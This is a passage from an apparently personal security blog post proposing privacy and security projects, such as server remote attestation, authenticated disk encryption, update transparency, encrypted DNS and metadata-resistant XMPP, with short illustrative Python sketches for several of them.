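    """Measure each boot component into the register before it runs."""
    pcr = b"\x00" * 32
    for c in components:
        pcr = extend(pcr, c)
    return pcr  # this is what the hardware-baked key signs for a remote verifier

# Hypothetical boot chain: firmware -> bootloader -> kernel -> initrd
boot_chain = [b"firmware-v1", b"bootloader-2.02", b"vmlinuz-4.9", b"initrd"]
expected = measure_chain(boot_chain)  # a verifier recomputes this from the
                                      # published server configuration
```

Swapping any component - or reordering them - produces a completely different final value, which is what lets the public detect a modified server.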

<p>Remote Attestation got a bad rap because one of its initial goals was to ensure you weren't bypassing DRM, and because it generally had no provisions for privacy protection (that key, after all, is a baked-in permanent identifier you couldn't change.) But instead of using it on individuals' laptops, let's turn it around and use it on servers. It would be great to enable some transparency into what sorts of things are happening on <a href="https://www.engadget.com/2016/10/08/reuters-yahoo-email-scanning-done-using-a-linux-kernel-module/">service providers' servers</a> and there are plenty of open source projects that handle user data that I'm sure would like to provide even greater transparency to their operations. So, set up your servers using Docker or Puppet or whatever and publish <em>exactly</em> what you are running on them, and allow the general public to use Remote Attestation to confirm that the server has not been modified from that configuration in any way. (It would also enable the service provider themselves to know if their servers were tampered with!)</p>

<p>This is hardly a weekend project. Secure Boot itself is finicky and that's not even getting into Remote Attestation. And there will be bypasses - both of Secure Boot and the integrity of the system that is being attested. But with each bypass we can (hopefully) improve the system and finally reach the goal of being able to verify, remotely, the integrity and transparency of a running server.</p>

<h4>Open Source TPM-Backed, Authenticated Disk Crypto</h4>

<p>I was pretty heavily involved in <a href="http://istruecryptauditedyet.com/">the TrueCrypt audit</a> and I've <a href="https://ritter.vg/blog-code_execution_bitlocker.html">played with BitLocker too</a>. I'm not a huge fan of either of them. Here's what I want in disk encryption software:</p>

<ul>
<li>Open Source - like TrueCrypt</li>
<li>Backed by a TPM - like BitLocker</li>
<li>Multiplatform - like TrueCrypt</li>
<li>Supports Full-Disk or Containers/Volumes - like TrueCrypt</li>
<li>Doesn't use XTS mode. At this point I think I would be happy with either Elephant from BitLocker, or an Authenticated Encryption mode like... no one. (I'd be fine with it eating up some of my disk space and performance storing authentication tags and doing a three-phase commit (write new tag, write data, overwrite old tag))</li>
</ul>
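To illustrate that last bullet, here's a toy sketch of per-sector authenticated encryption with the three-phase tag commit. Everything here is illustrative: the "stream cipher" is a hash-based stand-in (a real design would use a proper AEAD like AES-GCM), and a dict stands in for the disk:

```python
import hashlib, hmac, os

def keystream(key, nonce, n):
    """Toy counter-mode keystream for illustration only - NOT a real cipher."""
    out = b""
    ctr = 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + ctr.to_bytes(8, "big")).digest()
        ctr += 1
    return out[:n]

class AuthenticatedDisk:
    """Sector store with per-sector authentication tags and a three-phase
    commit: (1) journal the new tag, (2) write the data, (3) overwrite the
    old tag. A crash between phases leaves enough state to detect the torn
    write instead of silently accepting corrupt data."""
    def __init__(self, key):
        self.key = key
        self.sectors, self.tags, self.journal = {}, {}, {}

    def write(self, idx, plaintext):
        nonce = os.urandom(12)
        pad = keystream(self.key, nonce, len(plaintext))
        ct = bytes(a ^ b for a, b in zip(plaintext, pad))
        tag = hmac.new(self.key, nonce + ct, hashlib.sha256).digest()
        self.journal[idx] = tag           # phase 1: journal the new tag
        self.sectors[idx] = (nonce, ct)   # phase 2: write the data
        self.tags[idx] = tag              # phase 3: commit over the old tag
        del self.journal[idx]

    def read(self, idx):
        nonce, ct = self.sectors[idx]
        tag = hmac.new(self.key, nonce + ct, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, self.tags[idx]):
            raise ValueError("sector failed authentication (tampered or torn write)")
        pad = keystream(self.key, nonce, len(ct))
        return bytes(a ^ b for a, b in zip(ct, pad))
```

This is exactly the disk-space and performance cost mentioned above: an extra tag per sector plus extra writes - but a flipped ciphertext bit becomes a hard error instead of silently-garbled plaintext.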

<p>The whole 'hidden container' / 'hidden operating system' notion is... really cool. But I've never examined how easy or difficult it is to detect them in a realistic setting. And I am extremely skeptical even knowledgeable users have the discipline needed to maintain the 'cover volume' in a way that appears convincing to the authorities. So this would be neat but far from required.</p>

<p>There are other features that'd be nice for power users or enterprise customers, sure. Additional key slots for enterprise decryption; removable bootloader like LUKS on Linux. But they're not the standard feature set needed by the average person.</p>

<h4>Authenticated WebRTC Video Chats</h4>

<p>In the beginning (well not really, but I'm going to play fast and loose with how I refer to 'time' for this section) there was RedPhone and Silent Circle and we had this ZRTP thing and we could do encrypted calls on our phones and it seemed great. And then Skype and Facetime and Google Hangouts and Facebook Chat and the like came along (well they were already there but pretend with me) and they had <em>video</em> calls. And here we were with our (admittedly crappy) encrypted audio.</p>

<p>But it <em>doesn't have to be this way</em>. Why don't we have open source, end-to-end encrypted video chat? WebRTC is built into open source browsers!</p>

<p>If you've never looked at WebRTC I don't blame you. But let me tell you a few things about it. WebRTC usually uses a STUN server to coordinate a peer-to-peer connection, but if the p2p connection fails, a TURN server can be used to pass the (encrypted) media stream back and forth. The media stream is encrypted using DTLS. Now if the other side of your DTLS connection is just a user with a web browser, what certificate are they using and how would you validate it?  The answer is: a random certificate and you disable validation. But the important point is that WebRTC <a href="https://www.w3.org/TR/webrtc/#sec.cert-mgmt">exposes the certificate</a>.</p>

<p>So if we had some sort of end-to-end encrypted and authenticated chat, we could use that to bootstrap verification of WebRTC certificates! (...looks around optimistically...) Of course that's only part of the work, you would also need to go and find some <a href="https://github.com/trailofbits/tubertc">open source self-hosted RTC setup</a> to build upon...</p>
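The bootstrapping step itself is simple once you have an authenticated channel: hash the DER-encoded certificate, send the fingerprint through the encrypted messenger, and compare it with what you see on the DTLS wire. A sketch (the function names are mine, and the "certificate" below is just placeholder bytes):

```python
import hashlib, hmac

def fingerprint(cert_der):
    """SHA-256 fingerprint of a DER-encoded certificate, formatted as the
    familiar colon-separated hex pairs."""
    digest = hashlib.sha256(cert_der).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

def verify_peer(cert_seen_on_wire, fingerprint_from_e2e_channel):
    """Compare the certificate the DTLS handshake presented against the
    fingerprint the peer sent over the already-authenticated chat channel.
    Constant-time compare out of general paranoia."""
    return hmac.compare_digest(fingerprint(cert_seen_on_wire),
                               fingerprint_from_e2e_channel)
```

If the comparison fails, someone (a TURN server, say) substituted their own certificate into the handshake - exactly the attack that "disable validation" otherwise permits.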

<h4>Mic and Audio Cutoffs</h4>

<p>The first two laptops I owned (that weren't my father's) had a toggle switch on the side to turn the WiFi on and off. I don't know how they worked - if it was a software switch or a power switch. But in a world where even the <a href="http://www.dailymail.co.uk/sciencetech/article-4096490/Is-pope-worried-hackers-Snap-shows-pontiff-reading-iPad-camera-blocking-sticker.html">pope covers his camera with a sticker</a> it's <strong>high time laptops came with a hard power switch for the camera and microphone</strong>. And I don't mean a software switch (we've seen too many examples of those <a href="https://jscholarship.library.jhu.edu/handle/1774.2/36569">being bypassed</a>) I mean an honest to god 'If this LED is not lit then the microphone and camera are not getting power' switch.</p>

<p>It would be super-keen to have some kickstarter create USB and audio-jack shims that add this feature too, so you can retrofit existing desktop-like setups, but this seems like too much of a niche market since most users could either unplug the accessories or have them built in and unremovable.</p>

<p><small><em>It was pointed out to me that <a href="https://puri.sm/">Purism</a> makes laptops with this feature!</em></small></p>

<h4>Encrypted Broadcast Pager Network for SMS</h4>

<p>You know what has the potential to be surprisingly private? <a href="https://en.wikipedia.org/wiki/Pager">Pagers</a>. I'm not going to pretend I know anything about Pagers historically or how they're implemented today - but I do know that <a href="https://ritter.vg/blog-deanonymizing_amm.html">encrypted broadcast networks</a> can be secure. Imagine one-way pagers, with an encryption key baked into a SIM card, coupled with local or satellite transmitters. You're going to need to compromise on things like Forward Secrecy, but with products like <a href="http://www.gotenna.com/">goTenna</a> and <a href="https://www.beartooth.com/">beartooth</a> - antiquated technology is getting a new lease on life when applied correctly. I have to wonder if this would be helpful in places with unreliable or unsafe internet.</p>
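One plausible shape for this is recipient-anonymous broadcast: every pager hears every frame and try-authenticates each one, so the network never learns who a message is for. A toy sketch - the hash-based cipher is a placeholder, not a real design, and messages are limited to short pager-length payloads:

```python
import hashlib, hmac, os

def broadcast_frame(recipient_key, payload):
    """Encrypt-and-tag a short frame (up to 32 bytes) for one pager;
    every pager on the network hears the same frame."""
    nonce = os.urandom(12)
    pad = hashlib.sha256(recipient_key + nonce).digest()[:len(payload)]
    ct = bytes(a ^ b for a, b in zip(payload, pad))   # toy cipher, illustration only
    tag = hmac.new(recipient_key, nonce + ct, hashlib.sha256).digest()[:8]
    return nonce + ct + tag

def try_receive(my_key, frame):
    """Each pager tries every frame; only the holder of the right key
    ever sees plaintext. To everyone else, the frame is just noise."""
    nonce, ct, tag = frame[:12], frame[12:-8], frame[-8:]
    expected = hmac.new(my_key, nonce + ct, hashlib.sha256).digest()[:8]
    if not hmac.compare_digest(expected, tag):
        return None   # not addressed to us
    pad = hashlib.sha256(my_key + nonce).digest()[:len(ct)]
    return bytes(a ^ b for a, b in zip(ct, pad))
```

The receive side never transmits anything, which is what makes one-way pagers interesting: there's no uplink metadata to collect at all.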

<h4>More Better Faster Compiler Hardening</h4>

<p>Exploit Mitigations like Control Flow Integrity are great. What's not great is the performance loss. Don't get me wrong, it's gotten leaps and bounds better over the years but the truth of the matter is - that performance cost still holds back organizations from deploying the hardening features. So anything that can be done to make Control Flow Integrity, Memory Partitioning, Virtual Table Verification, or similar features faster gets my enthusiasm.</p>

<p>Oh and Microsoft, for christ-sakes, it's been <a href="https://media.blackhat.com/bh-us-12/Briefings/M_Miller/BH_US_12_Miller_Exploit_Mitigation_Slides.pdf">five years - let the rest of us use vtguard</a>.</p>

<h4>Update & Binary Transparency</h4>

<p>We're getting some good experience with Certificate Transparency; and we're also starting to flesh out some notions of Gossip (and that it's hard and that maybe it won't work the way we thought, but we're finally starting to talk about it.)  It's time to move to the next two items on the list: Update and Binary Transparency.</p>

<p>Let's tackle the easier one first: Update Transparency (or UT). Lots of applications, especially browsers, have small components in them that auto-update. Extensions, Safebrowsing lists, PKI revocation information, and the browser updates themselves. Each of these 'update packages' stands on its own as a discrete chunk of data. Why not require the (hash of the) data to be present in a Transparency Log, with a STH and inclusion proof before the update is accepted by the browser?</p>
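Verifying such an inclusion proof is the easy part - it's a handful of hashes, in the style of Certificate Transparency's RFC 6962 Merkle trees. A sketch:

```python
import hashlib

def leaf_hash(data):
    """RFC 6962-style domain separation: leaves are hashed with a 0x00 prefix."""
    return hashlib.sha256(b"\x00" + data).digest()

def node_hash(left, right):
    """Interior nodes get a 0x01 prefix so a leaf can't masquerade as a node."""
    return hashlib.sha256(b"\x01" + left + right).digest()

def verify_inclusion(update_pkg, proof, root):
    """proof: list of (sibling_hash, sibling_is_left) pairs, leaf to root.
    Recompute the path and check it lands on the published tree head."""
    h = leaf_hash(update_pkg)
    for sibling, sibling_is_left in proof:
        h = node_hash(sibling, h) if sibling_is_left else node_hash(h, sibling)
    return h == root
```

The browser would refuse to apply an update package unless a proof like this checks out against an STH it trusts - so any update the publisher ships to <em>anyone</em> leaves a permanent public record.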

<p>One would have to think through how Gossip might work for this. We'll assume that there are independent auditors that come configured with the application (a browser in this case) and/or can be added manually. When a browser receives an 'update package', before it applies it, it will send the STH to the auditors. This could be done a few ways:</p>

<ol>
<li>Over pinned HTTPS directly to the auditor. This reveals user identity and behavior to the auditor <em>but</em> enables confirmation that the auditor received and processed the STH.</li>
<li>Using DNS. This obscures user identity (up to the DNS resolver) but does not ensure to the application that the auditor received the data.</li>
<li>Over a proxied connection to the auditor, routed through the browser manufacturer. The browser establishes a secure connection to the browser manufacturer, then creates an inner secure connection to one or more auditors. Done correctly, this should obscure user identity, although like the other two it does reveal general usage information. I think this is probably the best option.</li>
</ol>

<p>Update transparency, while not simple, is simpler than Binary Transparency. When trying to think through Binary Transparency you run into concerns like a package's dependencies and different compilation options, and it requires reproducible builds to start with (which in turn require a very rigid toolchain...) That's not to say it shouldn't be explored also, but I think the next application of append-only Merkle Trees should be Update Transparency.</p>

<h4>Encrypted Email Delivery</h4>

<p>Email, and email security, is kind of confusing. MUA, MSA, MTA, MDA, SMTP, SMTPS, POP, POPS, IMAP, IMAPS, STARTTLS, and that's not even getting into SPF, DMARC, DKIM, <a href="https://datatracker.ietf.org/doc/rfc7672/">DANE</a> or (god forbid) encrypted email (of the PGP or S/MIME variety.) I'm just going to talk about <em>normal</em> email. Like you use.</p>

<p><em>Hopefully</em> when you check your email (and it's not in a browser), you do so using either POP or IMAP, over TLS or using STARTTLS. The certificate that's returned to you is <em>actually valid</em>. That is, if you're checking your gmail, and you try to connect to imap.gmail.com - you get a certificate valid for imap.gmail.com. When you <em>send</em> an email, you do so using SMTP over TLS or using STARTTLS and, again, you get a valid certificate. If you <em>don't</em> get a valid certificate or you cannot perform a STARTTLS upgrade from plaintext to TLS - the connection <em>fails</em>.</p>

<p>Now let me take an aside right here. This is what happens if you use gmail or email through your company etc etc. It's <em>not</em> what happens if you get your email from Earthlink or from Uncle Bob's Rural Internet Provider, Hanggliding, and BBQ.  I know this, for a fact, because for Earthlink <a href="http://blog.erratasec.com/2016/02/early-internet-services-considered.html">Robert Graham told me so</a> and for the latter I have family who get their Internet from Uncle Bob and <strong>TLS is not supported</strong>. Which means it's not just their email going over insecure connections, <em>it's their passwords too</em>.  But don't worry I'm sure they don't reuse the password. (Heh.)</p>

<p>Okay, let's come back to it. After you send your email, it goes from your Mail User Agent (MUA) to a Mail Submission Agent (MSA) to a Mail Transfer Agent (MTA). (The MSA and MTA are usually combined though.)  The MTA transfers the email to an MTA run by the email provider of the recipient (let's imagine someone on Yahoo emailing someone on Gmail.) This Yahoo-MTA to Gmail-MTA connection is the weak point in the chain. MTAs rarely have correct TLS certificates for them, but even if they did - it wouldn't help. You see, you find the MTA by looking up the <a href="https://en.wikipedia.org/wiki/MX_record">MX record</a> from DNS, and DNS is insecure. So even if the MTA required a valid certificate, the attacker could forge an MX record that points to their domain, that they have a valid certificate for.</p>

<p>It gets worse. Some MTAs don't support TLS at all. Combined with the certificate problem, we have a three-step problem. Some MTAs don't support TLS, so no MTA can require TLS unless it refuses to talk to some of the internet. Many MTAs that have TLS don't have valid certificates, so no MTA can require valid certificates unless it refuses to talk to some of the internet. And even if it has a valid certificate, almost no one has deployed DNSSEC so no MTA can require DNSSEC unless it refuses to talk to almost the entire internet. Google <a href="https://www.google.com/transparencyreport/saferemail/">publishes some data about this</a>.</p>

<p>BUT! We have solutions to these problems. They're actively being worked on over in <a href="https://datatracker.ietf.org/wg/uta/documents/">the IETF's UTA group</a>. <a href="https://datatracker.ietf.org/doc/draft-ietf-uta-mta-sts/">One draft is for pinning TLS support</a> (and it has a complementary <a href="https://datatracker.ietf.org/doc/draft-ietf-uta-smtp-tlsrpt/">error reporting draft</a>.) To secure the MX records, there's <a href="https://datatracker.ietf.org/doc/rfc7672/">DANE</a> but it requires DNSSEC.</p>
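For a feel of how lightweight the pinning draft (MTA-STS) is: the sending MTA fetches a small key/value text policy over HTTPS from a well-known URL on the recipient's domain and caches it. Here's a sketch of parsing one, against a made-up example.com policy:

```python
# A hypothetical MTA-STS policy, of the shape the draft describes:
# a version, a mode, one or more permitted MX patterns, and a cache lifetime.
SAMPLE_POLICY = """\
version: STSv1
mode: enforce
mx: *.mail.example.com
mx: backup.example.com
max_age: 604800
"""

def parse_mta_sts(text):
    """Parse 'key: value' policy lines; the 'mx' key may repeat."""
    policy = {"mx": []}
    for line in text.splitlines():
        if not line.strip():
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "mx":
            policy["mx"].append(value)
        else:
            policy[key] = value
    return policy
```

Once a sender has cached `mode: enforce` for a domain, a downgrade attack (stripping STARTTLS, or forging an MX record to a host not matching the `mx` patterns) turns into a hard failure instead of silent plaintext delivery.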

<p>Implementing these drafts and working on these problems makes a tangible impact on the security and privacy of millions of people.</p>

<h4>Delay Tolerant Networking</h4>

<p>DTN is one of those things that exists today, but you don't think about it or realize it. I mean <a href="https://www.quora.com/NASA-What-protocol-does-Curiosity-use-to-transmit-the-data-back-to-earth">NASA has to talk to Curiosity somehow!</a>  The <a href="https://datatracker.ietf.org/wg/dtn/documents/">IETF has gotten in on the game too</a>. I'm not really going to lie to you - I don't know what's going on in the DTN space. But I know it has a lot of applications that I'm interested in.</p>

<ul>
<li>Mix Networks</li>
<li>Mesh Networks, like those used <a href="http://www.npr.org/sections/alltechconsidered/2014/04/07/298925565/how-one-app-might-be-a-step-toward-internet-everywhere">in Taiwanese protests</a></li>
<li>Spotty connections, such as satellite downlinks and modems. Think of how Telecomix got some internet into and out of Egypt during the Arab Spring</li>
<li>Offline networks, where data is transmitted via USB Drives - which is hugely popular in Cuba and, I believe, parts of Africa</li>
<li>Peer-to-peer exchanges, like <a href="https://dev.guardianproject.info/projects/bazaar/wiki">the one Guardian Project is developing</a></li>
</ul>

<p>I'm kind of lumping disconnected peer-to-peer data exchange in with true 'delayed networking' but whatever. They're similar. Understanding how to build applications using what are hopefully safe and interoperable protocols sounds like an important path forward.</p>

<h4>Email Labels</h4>

<p>Come on world. It's 2017. Labels won, folders lost. Why is gmail the only real system out there using labels? I mean we have hardlinks in the filesystem for crying out loud.</p>

<p><small><em>There seems to be a thing called 'notmuch' that a few people I know use, and it might have labels (sorry 'tags')... But where's the webmail support? Thunderbird (RIP...)?</em></small></p>

<h4>Encrypted Email Databases</h4>

<p>You know what was really cool? Lavabit. I don't know about Lavabit today (they have been up to a <a href="https://lavabit.com/explain-lavabit.html">whole lot of work lately</a> which I should really investigate) but let's talk about Lavabit the day before the government demanded Snowden's emails.</p>

<p>Lavabit was designed so that the user's emails were encrypted with the user's email password. The password itself was sent to the server in plaintext (over TLS), so the server certainly could store the password and have complete access to the user's data - this is not groundbreaking impenetrable security. But you know what? It's completely transparent to the user, and it's better than leaving the emails laying around in plaintext. </p>
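One of those subtle improvements is easy to sketch: derive two independent keys from the password, so the verifier the server stores for login checks can't decrypt the mailbox. The parameters and labels below are illustrative, not a full design:

```python
import hashlib, hmac

def derive_keys(password, salt):
    """Stretch the user's password, then split it into two independent keys:
    one encrypts the mailbox (and ideally never leaves the client), one the
    server stores to check logins. Knowing the auth key doesn't reveal the
    encryption key."""
    master = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    enc_key = hmac.new(master, b"encryption", hashlib.sha256).digest()
    auth_key = hmac.new(master, b"authentication", hashlib.sha256).digest()
    return enc_key, auth_key
```

It's still not impenetrable - a malicious server can capture the password at login time, as with Lavabit - but it shrinks what a <em>stored-data</em> compromise or subpoena yields, at essentially no cost to the user experience.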

<p>Why haven't we made some subtle improvements to this design and deployed it? Why are we letting the perfect be the enemy of the good?</p>

<h4>Intel SGX Applications</h4>

<p>SGX allows you to take a bundle of code and lock it away inside a container where no one, not even root, can access its data or modify its code. It's both inspiring and terrifying: what amounts to giving every consumer their own HSM for free, and terrifyingly undebuggable malware. I can think of a lot of things one can do with this, including:</p>

<ul>
<li>Develop ports of gpg-agent and ssh-agent that move your key material into an SGX container</li>
<li>Develop something similar for TLS keys in apache/nginx</li>
<li>Create an SGX application that tries to detect other SGX applications running on the machine using side-channels such as allocating all memory reserved for SGX
  <ul><li>And see whether doing so can block other applications from running</li></ul></li>
<li>Investigate if EGETKEY can be used as a tracking vector. (See <a href="https://twitter.com/agl__/status/685574104682856448">this tweet</a>.)
  <ul><li>And create an application that factory resets and rotates the SGX keys every day</li></ul></li>
</ul>

<h4>grsecurity</h4>

<p><a href="https://grsecurity.net/">grsecurity</a> is pretty awesome. I would love for it to be more integrated (more features upstreamed) and easier to use (an Ubuntu distribution, for example). I can't claim to be familiar with the attempts that have been made in the past, but I can still dream of a future where the enhanced security it provides is easily available to all.</p>

<p><small><em>Apparently <a href="https://www.coldhak.ca/coldkernel/">coldkernel</a> is a project that makes it easier to use grsecurity, although it says it's "extremely alpha".</em></small></p>

<h4>Encrypted DNS</h4>

<p>Over in <a href="https://datatracker.ietf.org/wg/dprive/charter/">the DPRIVE group in the IETF</a> folks are developing how exactly to put DNS into TLS and DTLS. It's not that difficult, and you wind up with a relatively straightforward, multiplexed protocol. (The multiplexing is absolutely critical for performance, so I want to mention that up front.) But the problem with encrypted DNS isn't the protocol. It's the deployment.</p>
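To see how simple the wire format is: DNS-over-TLS is ordinary DNS messages sent over a TLS connection to port 853, each prefixed with a two-byte length (that prefix is what lets you multiplex queries on one connection). A sketch of building one such query - fields simplified, and no actual network I/O:

```python
import struct

def build_dns_query(qname, qtype=1, txid=0x1234):
    """Build a minimal DNS query (QTYPE 1 = A record) with the two-byte
    length prefix used for TCP and TLS transports."""
    # Header: id, flags (RD=1), 1 question, 0 answer/authority/additional
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    # QNAME wire format: length-prefixed labels, terminated by a zero byte
    qname_wire = b"".join(
        bytes([len(label)]) + label.encode() for label in qname.split(".")
    ) + b"\x00"
    question = qname_wire + struct.pack(">HH", qtype, 1)  # QCLASS 1 = IN
    msg = header + question
    return struct.pack(">H", len(msg)) + msg  # length prefix for TLS framing
```

You'd write these frames into a TLS socket connected to a resolver on port 853 - which brings us right back to the deployment question: whose resolver?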

<p>Right now the majority of people get their DNS from one of two places: their ISP or Google. The purpose of encrypted DNS is to protect your DNS queries from local network tampering and sniffing. So who do you choose to be on the <em>other end</em> of your encrypted DNS tunnel? Assuming they roll out the feature, do you choose Google? Or do we hope our ISPs provide it? Who hosts the encrypted DNS is a pretty big problem in this ecosystem.</p>

<p>The second big problem in this ecosystem is how applications on your machine perform DNS queries. The answer to that is <u>getaddrinfo</u> or <u>gethostbyname</u> - functions provided by the Operating System. So the OS is really the first mover in this equation - it needs to build in support for encrypted DNS lookup. But nameservers are almost always obtained by DHCP leases, so we need to get the DHCP servers to send locations of (D)TLS-supporting DNS resolvers once we somehow convince ISPs they should run them.</p> 

<p>There's one other option, besides the OS, that could build support for encrypted DNS, and that's the browser. A browser could build the feature and send all its DNS requests encrypted and that would make a difference to users.</p>

<p>But, if a browser were to ship this feature before the OS, they would need to set a default encrypted DNS server to use. Let's be very clear about what we're talking about here: the browser is adding a dependency on an external service, such that if the service stops working the browser either breaks or performance degrades. We know, because we have seen <a href="https://www.imperialviolet.org/2011/09/07/convergence.html">over</a> and <a href="https://www.imperialviolet.org/2012/02/05/crlsets.html">over</a> again, that browsers will not (and reasonably can not) rely on some third party that's expected to maintain good enough uptime and latency to keep their product working. So this means the browser has no choice but to run the encrypted DNS server themselves, thereby making their product phone home for every browsing interaction you make. And that's worse, to them, than sending the DNS in plaintext.</p>

<h4>Magic Folder</h4>

<p>Dropbox and all these cloud-synchronized folder things sure seem great. But maaaaybe I don't really want to give them all my files in plaintext. Surely there's something cryptography can do here, right? Either a Dropbox alternative that encrypts the files and stores them in a cloud, or a shim that encrypts the files in folder 'Plaintext' and puts the ciphertext into Dropbox's synced folder. (And to be clear, I'm not interested in encrypted <em>backup</em>, I'm interested in encrypted file synchronization.)</p>

<p>There are a couple of contenders - there's <a href="https://www.sparkleshare.org/">sparkleshare</a> which is basically a hopefully-friendly UI over a git repo that you can access over Tor if you wish. And the encrypted storage system Tahoe-LAFS is working on a <a href="http://tahoe-lafs.readthedocs.io/en/latest/proposed/magic-folder/filesystem-integration.html">Magic Folder</a> feature also.</p>

<p>I also know there are a lot of commercial offerings out there - I would <a href="https://www.cloudwards.net/top-10-secure-dropbox-alternatives/">start here</a> for researching both Dropbox alternatives and encrypting shims. But my hopes aren't too high since I want something cross-platform, open source, with a configurable cloud destination (either my own location or space I pay them for.)</p>

<h4>Services Hosting</h4>

<p>Google seems to be pretty decent when it comes to fighting for the user - they push back on legal requests that seem to be over-broad and don't just roll over when threatened. But who would you trust more to fight against legal requests: Google.... or the ACLU? Google... or the EFF?</p>

<p>I would pay a pretty penny to either the ACLU or EFF to host my email. Today, more and more services are being centralized and turning into de-facto monopolies. Google (email, DNS, and often an ISP), Akamai and Cloudflare (internet traffic), <a href="https://www.statista.com/statistics/217348/us-broadband-internet-susbcribers-by-cable-provider/">Charter and Comcast</a> (ISPs). It's surprisingly hard to get information about what portion of the internet is in Amazon EC2 - a 2012 report said 1% of the Internet (with one-third of internet users accessing it daily) and the Loudoun County, Virginia economic-development board claimed in 2015/2016 that 70% of the internet's traffic worldwide goes through that region. This centralization of the internet into a few providers is happening in conjunction with the region-izing of the Internet by promoting national services over international (China is most famous for this, but you see it elsewhere too.) And when national services can't compete, the government incentivizes companies like Google to set up offices and data centers - which seems like a no-brainer until you realize the legal implications of pissing off a government that has jurisdiction over your employees and facilities.</p>

<p>The Internet was built to be decentralized and federated, and we're losing that. Furthermore, we're delegating more of our data to publicly traded third party companies - and with that data <a href="https://en.wikipedia.org/wiki/Third-party_doctrine">goes our rights</a>. So I'd like to trust the people who are most invested in protecting our rights with my data - instead of the companies.</p>

<p>And there's a lot more than just email that I'd like them to run. I'd love for them to be my ISP for one. Then there's Google's DNS servers which see god-knows-how-much of the internet's traffic. I'm <em>really</em> uncomfortable with them getting that amount of data about my everyday web usage. There are good-of-the-internet public services like <a href="https://www.certificate-transparency.org/">Certificate Transparency Logs and Auditors</a>, the Encrypted DNS and Magic Folder services I mentioned earlier, as well as Tor nodes. But let's start with something simple: VPS Hosting and Email. Those are easily monetized.</p>

<h4>RNDC &amp; OMAPI</h4>

<p>What the heck are these? RNDC is a remote administration tool for BIND. OMAPI is a remote administration tool for DHCPd. As far as I can tell, both protocols are obscure and rarely investigated and only meant to be exposed to authorized hosts. But back when I did network penetration tests they were always popping up. I never got the chance to fuzz or audit them, but I bet you money that there are cryptographic errors, memory corruption, and logic errors lurking inside these extremely popular daemons. Want to make the Internet upgrade? This is my secret I'm telling you - start here.</p>

<h4>XMPP Chat Relay Network</h4>

<p>Alright, this one is kind of out there. Stay with me through it. First - let's assume we want to keep (and invest in) federated XMPP even though <a href="https://whispersystems.org/blog/the-ecosystem-is-moving/">there are some compelling reasons why that isn't a great idea</a>. So we've got XMPP (and OTR - pretend we got everyone OTR and upgraded the protocol to be more like Signal). There are some downsides here in terms of metadata - your server has your address book and it knows who you talk to, when, and the OTR ciphertext. Let's solve those problems.</p>

<p>First, let's create a volunteer, community run network of XMPP servers that allow anonymous registration. (Kind of like the Tor network, but they're running XMPP servers.) These servers auto-register to some directory, just like the Tor network, and your client downloads this directory periodically. They don't live forever, but they're reasonably long-lived (on the order of months) and have good uptime.</p>

<p>Second, let's create an incredibly sophisticated 'all-logic on the client' XMPP client. This XMPP client is going to act like a normal XMPP client that talks to your home server, but it also builds in OTR, retrieves that directory of semi-ephemeral servers, and implements a whole lot more logic, which we'll illustrate.</p>

<p>Let's watch what happens when Alice wants to talk to Bob. Alice creates several (we'll say three) completely ephemeral identities (maybe over Tor, maybe not) on three ephemeral servers, chooses one and starts a conversation with bob@example.com. There's an outer handshake, but subsequent to that, Alice identifies herself not <em>only</em> as jh43k45bdk@j4j56bdi4.com but also as her 'real identity' alice@example.net. Now that Bob knows who he's talking to, he replies 'Talk to me at qbhefeu4v@zbdkd3k5bf.com with key X' (which is one of three new ephemeral accounts he makes on ephemeral servers).  Alice does so, changing the account she used in the process. Now Alice and Bob are talking through an ephemeral server who has no idea who's talking.</p>
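Here's that handshake as a toy simulation. Everything in it - the names, the made-up domains, the structure - is hypothetical; it exists only to show which identities the relaying servers ever get to see:

```python
import secrets

def ephemeral_jid():
    """Mint a throwaway account on a (hypothetical) ephemeral server."""
    return f"{secrets.token_hex(5)}@{secrets.token_hex(5)}.example"

def rendezvous(alice_real, bob_real):
    """Sketch of the handshake above. The real identities are only ever
    exchanged inside the encrypted channel; the server relaying ciphertext
    sees nothing but ephemeral JIDs."""
    alice_eph = [ephemeral_jid() for _ in range(3)]   # Alice makes three
    # Outer handshake happens as alice_eph[0]; inside it, Alice identifies
    # herself as alice_real. Bob replies with a fresh ephemeral account of
    # his own to move the conversation to.
    bob_eph = ephemeral_jid()
    # Alice switches to a different ephemeral identity of hers for the move.
    return {
        "channel": (alice_eph[1], bob_eph),        # what the relay server sees
        "inner_identities": (alice_real, bob_real) # only visible end-to-end
    }
```

Run it and inspect the result: the `channel` JIDs the server observes carry no trace of alice@example.net or bob@example.com - which is the whole point of the split.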

<p>This type of protocol needs a <em>lot</em> of fleshing out, but the goals are that 'home' servers provide a friendly and persistent way for a stranger to locate a known contact but that they receive extremely little metadata. The XMPP servers that see ciphertext don't see identities. The XMPP servers that see identities don't see ciphertext. Clients regularly rotate ephemeral addresses to communicate with.</p>

<h4>Mix Networks for HTTP/3</h4>

<p>Here's another one that's pretty far out there. Look at your browser. Do you have facebook, twitter, or gmail open (or some other webmail or even outlook/thunderbird) - idling in some background tab, occasionally sending you notices or alerts? I'd be surprised if you didn't. A huge portion of the web uses these applications and a huge portion of their usage is sitting, idle, receiving status updates.</p>

<p>HTTP/2 was designed to be compatible with HTTP/1. Specifically, while the underlying transport changed to a multiplexed protocol with new compression applied - the notion of request-response with Headers and a Body remained unchanged. I doubt HTTP/3 will make any such compatibility efforts. Let's imagine what it might be then. Well, we can expect that in the future more and more people have high-bandwidth connections (we're seeing this move to fiber and gigabit now) <em>but</em> latency will still stink. Don't get me wrong, it will go down, but it's still slow comparatively. That's why there's the big push for protocols with fewer round trips. There's a lot of 'stuff' you have to download to use gmail, and even though now it's multiplexed and maybe even server push-ed the 'startup' time of gmail is still present. Gmail has a loading indicator. Facebook does too.</p>

